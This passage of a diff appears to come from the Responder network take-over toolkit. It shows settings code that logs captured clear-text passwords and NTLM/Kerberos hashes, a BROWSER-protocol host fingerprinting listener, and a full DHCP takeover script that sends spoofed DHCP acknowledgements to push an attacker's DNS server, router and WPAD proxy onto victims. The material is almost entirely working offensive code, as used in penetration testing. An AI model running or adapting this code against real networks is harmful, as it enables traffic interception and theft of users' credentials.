|
self.POP3Log = os.path.join(self.LogDir, 'POP3-Clear-Text-Password-%s.txt')
|
||||||
|
self.HTTPBasicLog = os.path.join(self.LogDir, 'HTTP-Clear-Text-Password-%s.txt')
|
||||||
|
self.LDAPClearLog = os.path.join(self.LogDir, 'LDAP-Clear-Text-Password-%s.txt')
|
||||||
|
self.SMBClearLog = os.path.join(self.LogDir, 'SMB-Clear-Text-Password-%s.txt')
|
||||||
|
self.SMTPClearLog = os.path.join(self.LogDir, 'SMTP-Clear-Text-Password-%s.txt')
|
||||||
|
self.MSSQLClearLog = os.path.join(self.LogDir, 'MSSQL-Clear-Text-Password-%s.txt')
|
||||||
|
|
||||||
|
self.LDAPNTLMv1Log = os.path.join(self.LogDir, 'LDAP-NTLMv1-Client-%s.txt')
|
||||||
|
self.HTTPNTLMv1Log = os.path.join(self.LogDir, 'HTTP-NTLMv1-Client-%s.txt')
|
||||||
|
self.HTTPNTLMv2Log = os.path.join(self.LogDir, 'HTTP-NTLMv2-Client-%s.txt')
|
||||||
|
self.KerberosLog = os.path.join(self.LogDir, 'MSKerberos-Client-%s.txt')
|
||||||
|
self.MSSQLNTLMv1Log = os.path.join(self.LogDir, 'MSSQL-NTLMv1-Client-%s.txt')
|
||||||
|
self.MSSQLNTLMv2Log = os.path.join(self.LogDir, 'MSSQL-NTLMv2-Client-%s.txt')
|
||||||
|
self.SMBNTLMv1Log = os.path.join(self.LogDir, 'SMB-NTLMv1-Client-%s.txt')
|
||||||
|
self.SMBNTLMv2Log = os.path.join(self.LogDir, 'SMB-NTLMv2-Client-%s.txt')
|
||||||
|
self.SMBNTLMSSPv1Log = os.path.join(self.LogDir, 'SMB-NTLMSSPv1-Client-%s.txt')
|
||||||
|
self.SMBNTLMSSPv2Log = os.path.join(self.LogDir, 'SMB-NTLMSSPv2-Client-%s.txt')
|
||||||
|
|
||||||
|
# HTTP Options
|
||||||
|
self.Serve_Exe = self.toBool(config.get('HTTP Server', 'Serve-Exe'))
|
||||||
|
self.Serve_Always = self.toBool(config.get('HTTP Server', 'Serve-Always'))
|
||||||
|
self.Serve_Html = self.toBool(config.get('HTTP Server', 'Serve-Html'))
|
||||||
|
self.Html_Filename = config.get('HTTP Server', 'HtmlFilename')
|
||||||
|
self.Exe_Filename = config.get('HTTP Server', 'ExeFilename')
|
||||||
|
self.Exe_DlName = config.get('HTTP Server', 'ExeDownloadName')
|
||||||
|
self.WPAD_Script = config.get('HTTP Server', 'WPADScript')
|
||||||
|
self.HtmlToInject = config.get('HTTP Server', 'HtmlToInject')
|
||||||
|
|
||||||
|
if not os.path.exists(self.Html_Filename):
|
||||||
|
print utils.color("/!\ Warning: %s: file not found" % self.Html_Filename, 3, 1)
|
||||||
|
|
||||||
|
if not os.path.exists(self.Exe_Filename):
|
||||||
|
print utils.color("/!\ Warning: %s: file not found" % self.Exe_Filename, 3, 1)
|
||||||
|
|
||||||
|
# SSL Options
|
||||||
|
self.SSLKey = config.get('HTTPS Server', 'SSLKey')
|
||||||
|
self.SSLCert = config.get('HTTPS Server', 'SSLCert')
|
||||||
|
|
||||||
|
# Respond to hosts
|
||||||
|
self.RespondTo = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')])
|
||||||
|
self.RespondToName = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondToName').strip().split(',')])
|
||||||
|
self.DontRespondTo = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')])
|
||||||
|
self.DontRespondToName = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToName').strip().split(',')])
|
||||||
|
|
||||||
|
# Auto Ignore List
|
||||||
|
self.AutoIgnore = self.toBool(config.get('Responder Core', 'AutoIgnoreAfterSuccess'))
|
||||||
|
self.CaptureMultipleCredentials = self.toBool(config.get('Responder Core', 'CaptureMultipleCredentials'))
|
||||||
|
self.AutoIgnoreList = []
|
||||||
|
|
||||||
|
# CLI options
|
||||||
|
self.LM_On_Off = options.LM_On_Off
|
||||||
|
self.WPAD_On_Off = options.WPAD_On_Off
|
||||||
|
self.Wredirect = options.Wredirect
|
||||||
|
self.NBTNSDomain = options.NBTNSDomain
|
||||||
|
self.Basic = options.Basic
|
||||||
|
self.Finger_On_Off = options.Finger
|
||||||
|
self.Interface = options.Interface
|
||||||
|
self.OURIP = options.OURIP
|
||||||
|
self.Force_WPAD_Auth = options.Force_WPAD_Auth
|
||||||
|
self.Upstream_Proxy = options.Upstream_Proxy
|
||||||
|
self.AnalyzeMode = options.Analyze
|
||||||
|
self.Verbose = options.Verbose
|
||||||
|
self.ProxyAuth_On_Off = options.ProxyAuth_On_Off
|
||||||
|
self.CommandLine = str(sys.argv)
|
||||||
|
|
||||||
|
if self.HtmlToInject is None:
|
||||||
|
self.HtmlToInject = ''
|
||||||
|
|
||||||
|
self.Bind_To = utils.FindLocalIP(self.Interface, self.OURIP)
|
||||||
|
|
||||||
|
self.IP_aton = socket.inet_aton(self.Bind_To)
|
||||||
|
self.Os_version = sys.platform
|
||||||
|
|
||||||
|
# Set up Challenge
|
||||||
|
self.NumChal = config.get('Responder Core', 'Challenge')
|
||||||
|
|
||||||
|
if len(self.NumChal) is not 16:
|
||||||
|
print utils.color("[!] The challenge must be exactly 16 chars long.\nExample: 1122334455667788", 1)
|
||||||
|
sys.exit(-1)
|
||||||
|
|
||||||
|
self.Challenge = ""
|
||||||
|
for i in range(0, len(self.NumChal),2):
|
||||||
|
self.Challenge += self.NumChal[i:i+2].decode("hex")
|
||||||
|
|
||||||
|
# Set up logging
|
||||||
|
logging.basicConfig(filename=self.SessionLogFile, level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
|
||||||
|
logging.warning('Responder Started: %s' % self.CommandLine)
|
||||||
|
|
||||||
|
Formatter = logging.Formatter('%(asctime)s - %(message)s')
|
||||||
|
CLog_Handler = logging.FileHandler(self.ResponderConfigDump, 'a')
|
||||||
|
PLog_Handler = logging.FileHandler(self.PoisonersLogFile, 'w')
|
||||||
|
ALog_Handler = logging.FileHandler(self.AnalyzeLogFile, 'a')
|
||||||
|
CLog_Handler.setLevel(logging.INFO)
|
||||||
|
PLog_Handler.setLevel(logging.INFO)
|
||||||
|
ALog_Handler.setLevel(logging.INFO)
|
||||||
|
PLog_Handler.setFormatter(Formatter)
|
||||||
|
ALog_Handler.setFormatter(Formatter)
|
||||||
|
|
||||||
|
self.ResponderConfigLogger = logging.getLogger('Config Dump Log')
|
||||||
|
self.ResponderConfigLogger.addHandler(CLog_Handler)
|
||||||
|
|
||||||
|
self.PoisonersLogger = logging.getLogger('Poisoners Log')
|
||||||
|
self.PoisonersLogger.addHandler(PLog_Handler)
|
||||||
|
|
||||||
|
self.AnalyzeLogger = logging.getLogger('Analyze Log')
|
||||||
|
self.AnalyzeLogger.addHandler(ALog_Handler)
|
||||||
|
|
||||||
|
NetworkCard = subprocess.check_output(["ifconfig", "-a"])
|
||||||
|
DNS = subprocess.check_output(["cat", "/etc/resolv.conf"])
|
||||||
|
RoutingInfo = subprocess.check_output(["netstat", "-rn"])
|
||||||
|
Message = "Current environment is:\nNetwork Config:\n%s\nDNS Settings:\n%s\nRouting info:\n%s\n\n"%(NetworkCard,DNS,RoutingInfo)
|
||||||
|
self.ResponderConfigLogger.warning(Message)
|
||||||
|
self.ResponderConfigLogger.warning(str(self))
|
||||||
|
|
||||||
|
def init():
|
||||||
|
global Config
|
||||||
|
Config = Settings()
|
||||||
118
tools/BrowserListener.py
Normal file
118
tools/BrowserListener.py
Normal file
@@ -0,0 +1,118 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# This file is part of Responder, a network take-over set of tools
|
||||||
|
# created and maintained by Laurent Gaffie.
|
||||||
|
# email: laurent.gaffie@gmail.com
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
import sys
|
||||||
|
import os
|
||||||
|
import thread
|
||||||
|
|
||||||
|
BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
|
||||||
|
sys.path.insert(0, BASEDIR)
|
||||||
|
|
||||||
|
from servers.Browser import WorkstationFingerPrint, RequestType, RAPThisDomain, RapFinger
|
||||||
|
from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler
|
||||||
|
from threading import Lock
|
||||||
|
from utils import *
|
||||||
|
|
||||||
|
def ParseRoles(data):
|
||||||
|
if len(data) != 4:
|
||||||
|
return ''
|
||||||
|
|
||||||
|
AllRoles = {
|
||||||
|
'Workstation': (ord(data[0]) >> 0) & 1,
|
||||||
|
'Server': (ord(data[0]) >> 1) & 1,
|
||||||
|
'SQL': (ord(data[0]) >> 2) & 1,
|
||||||
|
'Domain Controller': (ord(data[0]) >> 3) & 1,
|
||||||
|
'Backup Controller': (ord(data[0]) >> 4) & 1,
|
||||||
|
'Time Source': (ord(data[0]) >> 5) & 1,
|
||||||
|
'Apple': (ord(data[0]) >> 6) & 1,
|
||||||
|
'Novell': (ord(data[0]) >> 7) & 1,
|
||||||
|
'Member': (ord(data[1]) >> 0) & 1,
|
||||||
|
'Print': (ord(data[1]) >> 1) & 1,
|
||||||
|
'Dialin': (ord(data[1]) >> 2) & 1,
|
||||||
|
'Xenix': (ord(data[1]) >> 3) & 1,
|
||||||
|
'NT Workstation': (ord(data[1]) >> 4) & 1,
|
||||||
|
'WfW': (ord(data[1]) >> 5) & 1,
|
||||||
|
'Unused': (ord(data[1]) >> 6) & 1,
|
||||||
|
'NT Server': (ord(data[1]) >> 7) & 1,
|
||||||
|
'Potential Browser': (ord(data[2]) >> 0) & 1,
|
||||||
|
'Backup Browser': (ord(data[2]) >> 1) & 1,
|
||||||
|
'Master Browser': (ord(data[2]) >> 2) & 1,
|
||||||
|
'Domain Master Browser': (ord(data[2]) >> 3) & 1,
|
||||||
|
'OSF': (ord(data[2]) >> 4) & 1,
|
||||||
|
'VMS': (ord(data[2]) >> 5) & 1,
|
||||||
|
'Windows 95+': (ord(data[2]) >> 6) & 1,
|
||||||
|
'DFS': (ord(data[2]) >> 7) & 1,
|
||||||
|
'Local': (ord(data[3]) >> 6) & 1,
|
||||||
|
'Domain Enum': (ord(data[3]) >> 7) & 1,
|
||||||
|
}
|
||||||
|
|
||||||
|
return ', '.join(k for k,v in AllRoles.items() if v == 1)
|
||||||
|
|
||||||
|
|
||||||
|
class BrowserListener(BaseRequestHandler):
|
||||||
|
def handle(self):
|
||||||
|
data, socket = self.request
|
||||||
|
|
||||||
|
lock = Lock()
|
||||||
|
lock.acquire()
|
||||||
|
|
||||||
|
DataOffset = struct.unpack('<H',data[139:141])[0]
|
||||||
|
BrowserPacket = data[82+DataOffset:]
|
||||||
|
ReqType = RequestType(BrowserPacket[0])
|
||||||
|
|
||||||
|
Domain = Decode_Name(data[49:81])
|
||||||
|
Name = Decode_Name(data[15:47])
|
||||||
|
Role1 = NBT_NS_Role(data[45:48])
|
||||||
|
Role2 = NBT_NS_Role(data[79:82])
|
||||||
|
Fprint = WorkstationFingerPrint(data[190:192])
|
||||||
|
Roles = ParseRoles(data[192:196])
|
||||||
|
|
||||||
|
print text("[BROWSER] Request Type : %s" % ReqType)
|
||||||
|
print text("[BROWSER] Address : %s" % self.client_address[0])
|
||||||
|
print text("[BROWSER] Domain : %s" % Domain)
|
||||||
|
print text("[BROWSER] Name : %s" % Name)
|
||||||
|
print text("[BROWSER] Main Role : %s" % Role1)
|
||||||
|
print text("[BROWSER] 2nd Role : %s" % Role2)
|
||||||
|
print text("[BROWSER] Fingerprint : %s" % Fprint)
|
||||||
|
print text("[BROWSER] Role List : %s" % Roles)
|
||||||
|
|
||||||
|
RAPThisDomain(self.client_address[0], Domain)
|
||||||
|
|
||||||
|
lock.release()
|
||||||
|
|
||||||
|
|
||||||
|
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
|
||||||
|
def server_bind(self):
|
||||||
|
self.allow_reuse_address = 1
|
||||||
|
UDPServer.server_bind(self)
|
||||||
|
|
||||||
|
def serve_thread_udp_broadcast(host, port, handler):
|
||||||
|
try:
|
||||||
|
server = ThreadingUDPServer(('', port), handler)
|
||||||
|
server.serve_forever()
|
||||||
|
except:
|
||||||
|
print "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
try:
|
||||||
|
print "Listening for BROWSER datagrams..."
|
||||||
|
thread.start_new(serve_thread_udp_broadcast,('', 138, BrowserListener))
|
||||||
|
|
||||||
|
while True:
|
||||||
|
time.sleep(1)
|
||||||
|
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
sys.exit("\r Exiting...")
|
||||||
318
tools/DHCP.py
Executable file
318
tools/DHCP.py
Executable file
@@ -0,0 +1,318 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# This file is part of Responder, a network take-over set of tools
|
||||||
|
# created and maintained by Laurent Gaffie.
|
||||||
|
# email: laurent.gaffie@gmail.com
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
import sys
|
||||||
|
import struct
|
||||||
|
import optparse
|
||||||
|
import ConfigParser
|
||||||
|
import os
|
||||||
|
|
||||||
|
BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
|
||||||
|
sys.path.insert(0, BASEDIR)
|
||||||
|
from odict import OrderedDict
|
||||||
|
from packets import Packet
|
||||||
|
from utils import *
|
||||||
|
|
||||||
|
parser = optparse.OptionParser(usage='python %prog -I eth0 -d pwned.com -p 10.20.30.40 -s 10.20.30.1 -r 10.20.40.1', prog=sys.argv[0],)
|
||||||
|
parser.add_option('-I', '--interface', action="store", help="Interface name to use, example: eth0", metavar="eth0",dest="Interface")
|
||||||
|
parser.add_option('-d', '--dnsname', action="store", help="DNS name to inject, if you don't want to inject a DNS server, provide the original one.", metavar="pwned.com", default="pwned.com",dest="DNSNAME")
|
||||||
|
parser.add_option('-r', '--router', action="store", help="The ip address of the router or yours if you want to intercept traffic.", metavar="10.20.1.1",dest="RouterIP")
|
||||||
|
parser.add_option('-p', '--primary', action="store", help="The ip address of the original primary DNS server or yours", metavar="10.20.1.10",dest="DNSIP")
|
||||||
|
parser.add_option('-s', '--secondary', action="store", help="The ip address of the original secondary DNS server or yours", metavar="10.20.1.11",dest="DNSIP2")
|
||||||
|
parser.add_option('-n', '--netmask', action="store", help="The netmask of this network", metavar="255.255.255.0", default="255.255.255.0", dest="Netmask")
|
||||||
|
parser.add_option('-w', '--wpadserver', action="store", help="Your WPAD server string", metavar="\"http://wpadsrv/wpad.dat\"", default="", dest="WPAD")
|
||||||
|
parser.add_option('-S', action="store_true", help="Spoof the router ip address",dest="Spoof")
|
||||||
|
parser.add_option('-R', action="store_true", help="Respond to DHCP Requests, inject linux clients (very noisy, this is sent on 255.255.255.255)", dest="Respond_To_Requests")
|
||||||
|
options, args = parser.parse_args()
|
||||||
|
|
||||||
|
def color(txt, code = 1, modifier = 0):
|
||||||
|
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
|
||||||
|
|
||||||
|
if options.Interface is None:
|
||||||
|
print color("[!]", 1, 1), "-I mandatory option is missing, please provide an interface."
|
||||||
|
exit(-1)
|
||||||
|
elif options.RouterIP is None:
|
||||||
|
print color("[!]", 1, 1), "-r mandatory option is missing, please provide the router's IP."
|
||||||
|
exit(-1)
|
||||||
|
elif options.DNSIP is None:
|
||||||
|
print color("[!]", 1, 1), "-p mandatory option is missing, please provide the primary DNS server ip address or yours."
|
||||||
|
exit(-1)
|
||||||
|
elif options.DNSIP2 is None:
|
||||||
|
print color("[!]", 1, 1), "-s mandatory option is missing, please provide the secondary DNS server ip address or yours."
|
||||||
|
exit(-1)
|
||||||
|
|
||||||
|
|
||||||
|
print '#############################################################################'
|
||||||
|
print '## DHCP INFORM TAKEOVER 0.2 ##'
|
||||||
|
print '## ##'
|
||||||
|
print '## By default, this script will only inject a new DNS/WPAD ##'
|
||||||
|
print '## server to a Windows <= XP/2003 machine. ##'
|
||||||
|
print '## ##'
|
||||||
|
print '## To inject a DNS server/domain/route on a Windows >= Vista and ##'
|
||||||
|
print '## any linux box, use -R (can be noisy) ##'
|
||||||
|
print '## ##'
|
||||||
|
print '## Use `RespondTo` setting in Responder.conf for in-scope targets only. ##'
|
||||||
|
print '#############################################################################'
|
||||||
|
print ''
|
||||||
|
print color('[*]', 2, 1), 'Listening for events...'
|
||||||
|
|
||||||
|
config = ConfigParser.ConfigParser()
|
||||||
|
config.read(os.path.join(BASEDIR,'Responder.conf'))
|
||||||
|
RespondTo = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')])
|
||||||
|
DontRespondTo = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')])
|
||||||
|
Interface = options.Interface
|
||||||
|
Responder_IP = FindLocalIP(Interface)
|
||||||
|
ROUTERIP = options.RouterIP
|
||||||
|
NETMASK = options.Netmask
|
||||||
|
DHCPSERVER = Responder_IP
|
||||||
|
DNSIP = options.DNSIP
|
||||||
|
DNSIP2 = options.DNSIP2
|
||||||
|
DNSNAME = options.DNSNAME
|
||||||
|
WPADSRV = options.WPAD.strip() + "\\n"
|
||||||
|
Spoof = options.Spoof
|
||||||
|
Respond_To_Requests = options.Respond_To_Requests
|
||||||
|
|
||||||
|
if Spoof:
|
||||||
|
DHCPSERVER = ROUTERIP
|
||||||
|
|
||||||
|
##### IP Header #####
|
||||||
|
class IPHead(Packet):
|
||||||
|
fields = OrderedDict([
|
||||||
|
("Version", "\x45"),
|
||||||
|
("DiffServices", "\x00"),
|
||||||
|
("TotalLen", "\x00\x00"),
|
||||||
|
("Ident", "\x00\x00"),
|
||||||
|
("Flags", "\x00\x00"),
|
||||||
|
("TTL", "\x40"),
|
||||||
|
("Protocol", "\x11"),
|
||||||
|
("Checksum", "\x00\x00"),
|
||||||
|
("SrcIP", ""),
|
||||||
|
("DstIP", ""),
|
||||||
|
])
|
||||||
|
|
||||||
|
class UDP(Packet):
|
||||||
|
fields = OrderedDict([
|
||||||
|
("SrcPort", "\x00\x43"),
|
||||||
|
("DstPort", "\x00\x44"),
|
||||||
|
("Len", "\x00\x00"),
|
||||||
|
("Checksum", "\x00\x00"),
|
||||||
|
("Data", "\x00\x00"),
|
||||||
|
])
|
||||||
|
|
||||||
|
def calculate(self):
|
||||||
|
self.fields["Len"] = struct.pack(">h",len(str(self.fields["Data"]))+8)
|
||||||
|
|
||||||
|
class DHCPACK(Packet):
|
||||||
|
fields = OrderedDict([
|
||||||
|
("MessType", "\x02"),
|
||||||
|
("HdwType", "\x01"),
|
||||||
|
("HdwLen", "\x06"),
|
||||||
|
("Hops", "\x00"),
|
||||||
|
("Tid", "\x11\x22\x33\x44"),
|
||||||
|
("ElapsedSec", "\x00\x00"),
|
||||||
|
("BootpFlags", "\x00\x00"),
|
||||||
|
("ActualClientIP", "\x00\x00\x00\x00"),
|
||||||
|
("GiveClientIP", "\x00\x00\x00\x00"),
|
||||||
|
("NextServerIP", "\x00\x00\x00\x00"),
|
||||||
|
("RelayAgentIP", "\x00\x00\x00\x00"),
|
||||||
|
("ClientMac", "\xff\xff\xff\xff\xff\xff"),
|
||||||
|
("ClientMacPadding", "\x00" *10),
|
||||||
|
("ServerHostname", "\x00" * 64),
|
||||||
|
("BootFileName", "\x00" * 128),
|
||||||
|
("MagicCookie", "\x63\x82\x53\x63"),
|
||||||
|
("DHCPCode", "\x35"), #DHCP Message
|
||||||
|
("DHCPCodeLen", "\x01"),
|
||||||
|
("DHCPOpCode", "\x05"), #Msgtype(ACK)
|
||||||
|
("Op54", "\x36"),
|
||||||
|
("Op54Len", "\x04"),
|
||||||
|
("Op54Str", ""), #DHCP Server
|
||||||
|
("Op51", "\x33"),
|
||||||
|
("Op51Len", "\x04"),
|
||||||
|
("Op51Str", "\x00\x01\x51\x80"), #Lease time, 1 day
|
||||||
|
("Op1", "\x01"),
|
||||||
|
("Op1Len", "\x04"),
|
||||||
|
("Op1Str", ""), #Netmask
|
||||||
|
("Op15", "\x0f"),
|
||||||
|
("Op15Len", "\x0e"),
|
||||||
|
("Op15Str", ""), #DNS Name
|
||||||
|
("Op3", "\x03"),
|
||||||
|
("Op3Len", "\x04"),
|
||||||
|
("Op3Str", ""), #Router
|
||||||
|
("Op6", "\x06"),
|
||||||
|
("Op6Len", "\x08"),
|
||||||
|
("Op6Str", ""), #DNS Servers
|
||||||
|
("Op252", "\xfc"),
|
||||||
|
("Op252Len", "\x04"),
|
||||||
|
("Op252Str", ""), #Wpad Server
|
||||||
|
("Op255", "\xff"),
|
||||||
|
("Padding", "\x00"),
|
||||||
|
])
|
||||||
|
|
||||||
|
def calculate(self):
|
||||||
|
self.fields["Op54Str"] = socket.inet_aton(DHCPSERVER)
|
||||||
|
self.fields["Op1Str"] = socket.inet_aton(NETMASK)
|
||||||
|
self.fields["Op3Str"] = socket.inet_aton(ROUTERIP)
|
||||||
|
self.fields["Op6Str"] = socket.inet_aton(DNSIP)+socket.inet_aton(DNSIP2)
|
||||||
|
self.fields["Op15Str"] = DNSNAME
|
||||||
|
self.fields["Op252Str"] = WPADSRV
|
||||||
|
self.fields["Op15Len"] = struct.pack(">b",len(str(self.fields["Op15Str"])))
|
||||||
|
self.fields["Op252Len"] = struct.pack(">b",len(str(self.fields["Op252Str"])))
|
||||||
|
|
||||||
|
class DHCPInformACK(Packet):
|
||||||
|
fields = OrderedDict([
|
||||||
|
("MessType", "\x02"),
|
||||||
|
("HdwType", "\x01"),
|
||||||
|
("HdwLen", "\x06"),
|
||||||
|
("Hops", "\x00"),
|
||||||
|
("Tid", "\x11\x22\x33\x44"),
|
||||||
|
("ElapsedSec", "\x00\x00"),
|
||||||
|
("BootpFlags", "\x00\x00"),
|
||||||
|
("ActualClientIP", "\x00\x00\x00\x00"),
|
||||||
|
("GiveClientIP", "\x00\x00\x00\x00"),
|
||||||
|
("NextServerIP", "\x00\x00\x00\x00"),
|
||||||
|
("RelayAgentIP", "\x00\x00\x00\x00"),
|
||||||
|
("ClientMac", "\xff\xff\xff\xff\xff\xff"),
|
||||||
|
("ClientMacPadding", "\x00" *10),
|
||||||
|
("ServerHostname", "\x00" * 64),
|
||||||
|
("BootFileName", "\x00" * 128),
|
||||||
|
("MagicCookie", "\x63\x82\x53\x63"),
|
||||||
|
("Op53", "\x35\x01\x05"), #Msgtype(ACK)
|
||||||
|
("Op54", "\x36"),
|
||||||
|
("Op54Len", "\x04"),
|
||||||
|
("Op54Str", ""), #DHCP Server
|
||||||
|
("Op1", "\x01"),
|
||||||
|
("Op1Len", "\x04"),
|
||||||
|
("Op1Str", ""), #Netmask
|
||||||
|
("Op15", "\x0f"),
|
||||||
|
("Op15Len", "\x0e"),
|
||||||
|
("Op15Str", ""), #DNS Name
|
||||||
|
("Op3", "\x03"),
|
||||||
|
("Op3Len", "\x04"),
|
||||||
|
("Op3Str", ""), #Router
|
||||||
|
("Op6", "\x06"),
|
||||||
|
("Op6Len", "\x08"),
|
||||||
|
("Op6Str", ""), #DNS Servers
|
||||||
|
("Op252", "\xfc"),
|
||||||
|
("Op252Len", "\x04"),
|
||||||
|
("Op252Str", ""), #Wpad Server.
|
||||||
|
("Op255", "\xff"),
|
||||||
|
])
|
||||||
|
|
||||||
|
def calculate(self):
|
||||||
|
self.fields["Op54Str"] = socket.inet_aton(DHCPSERVER)
|
||||||
|
self.fields["Op1Str"] = socket.inet_aton(NETMASK)
|
||||||
|
self.fields["Op3Str"] = socket.inet_aton(ROUTERIP)
|
||||||
|
self.fields["Op6Str"] = socket.inet_aton(DNSIP)+socket.inet_aton(DNSIP2)
|
||||||
|
self.fields["Op15Str"] = DNSNAME
|
||||||
|
self.fields["Op252Str"] = WPADSRV
|
||||||
|
self.fields["Op15Len"] = struct.pack(">b",len(str(self.fields["Op15Str"])))
|
||||||
|
self.fields["Op252Len"] = struct.pack(">b",len(str(self.fields["Op252Str"])))
|
||||||
|
|
||||||
|
def SpoofIP(Spoof):
|
||||||
|
return ROUTERIP if Spoof else Responder_IP
|
||||||
|
|
||||||
|
def RespondToThisIP(ClientIp):
|
||||||
|
if ClientIp.startswith('127.0.0.'):
|
||||||
|
return False
|
||||||
|
elif RespondTo and ClientIp not in RespondTo:
|
||||||
|
return False
|
||||||
|
elif ClientIp in RespondTo or RespondTo == []:
|
||||||
|
if ClientIp not in DontRespondTo:
|
||||||
|
return True
|
||||||
|
return False
|
||||||
|
|
||||||
|
def ParseSrcDSTAddr(data):
|
||||||
|
SrcIP = socket.inet_ntoa(data[0][26:30])
|
||||||
|
DstIP = socket.inet_ntoa(data[0][30:34])
|
||||||
|
SrcPort = struct.unpack('>H',data[0][34:36])[0]
|
||||||
|
DstPort = struct.unpack('>H',data[0][36:38])[0]
|
||||||
|
return SrcIP, SrcPort, DstIP, DstPort
|
||||||
|
|
||||||
|
def FindIP(data):
|
||||||
|
IP = ''.join(re.findall(r'(?<=\x32\x04)[^EOF]*', data))
|
||||||
|
return ''.join(IP[0:4])
|
||||||
|
|
||||||
|
def ParseDHCPCode(data):
|
||||||
|
PTid = data[4:8]
|
||||||
|
Seconds = data[8:10]
|
||||||
|
CurrentIP = socket.inet_ntoa(data[12:16])
|
||||||
|
RequestedIP = socket.inet_ntoa(data[16:20])
|
||||||
|
MacAddr = data[28:34]
|
||||||
|
MacAddrStr = ':'.join('%02x' % ord(m) for m in MacAddr).upper()
|
||||||
|
OpCode = data[242:243]
|
||||||
|
RequestIP = data[245:249]
|
||||||
|
|
||||||
|
# DHCP Inform
|
||||||
|
if OpCode == "\x08":
|
||||||
|
IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=socket.inet_aton(CurrentIP))
|
||||||
|
Packet = DHCPInformACK(Tid=PTid, ClientMac=MacAddr, ActualClientIP=socket.inet_aton(CurrentIP),
|
||||||
|
GiveClientIP=socket.inet_aton("0.0.0.0"),
|
||||||
|
NextServerIP=socket.inet_aton("0.0.0.0"),
|
||||||
|
RelayAgentIP=socket.inet_aton("0.0.0.0"),
|
||||||
|
ElapsedSec=Seconds)
|
||||||
|
Packet.calculate()
|
||||||
|
Buffer = UDP(Data = Packet)
|
||||||
|
Buffer.calculate()
|
||||||
|
SendDHCP(str(IP_Header)+str(Buffer), (CurrentIP, 68))
|
||||||
|
return 'Acknowledged DHCP Inform for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
|
||||||
|
elif OpCode == "\x03" and Respond_To_Requests: # DHCP Request
|
||||||
|
IP = FindIP(data)
|
||||||
|
if IP:
|
||||||
|
IPConv = socket.inet_ntoa(IP)
|
||||||
|
if RespondToThisIP(IPConv):
|
||||||
|
IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=IP)
|
||||||
|
Packet = DHCPACK(Tid=PTid, ClientMac=MacAddr, GiveClientIP=IP, ElapsedSec=Seconds)
|
||||||
|
Packet.calculate()
|
||||||
|
Buffer = UDP(Data = Packet)
|
||||||
|
Buffer.calculate()
|
||||||
|
SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 68))
|
||||||
|
return 'Acknowledged DHCP Request for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
|
||||||
|
elif OpCode == "\x01" and Respond_To_Requests: # DHCP Discover
|
||||||
|
IP = FindIP(data)
|
||||||
|
if IP:
|
||||||
|
IPConv = socket.inet_ntoa(IP)
|
||||||
|
if RespondToThisIP(IPConv):
|
||||||
|
IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=IP)
|
||||||
|
Packet = DHCPACK(Tid=PTid, ClientMac=MacAddr, GiveClientIP=IP, DHCPOpCode="\x02", ElapsedSec=Seconds)
|
||||||
|
Packet.calculate()
|
||||||
|
Buffer = UDP(Data = Packet)
|
||||||
|
Buffer.calculate()
|
||||||
|
SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 0))
|
||||||
|
return 'Acknowledged DHCP Discover for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
|
||||||
|
|
||||||
|
def SendDHCP(packet,Host):
|
||||||
|
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
|
||||||
|
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
|
||||||
|
s.sendto(packet, Host)
|
||||||
|
|
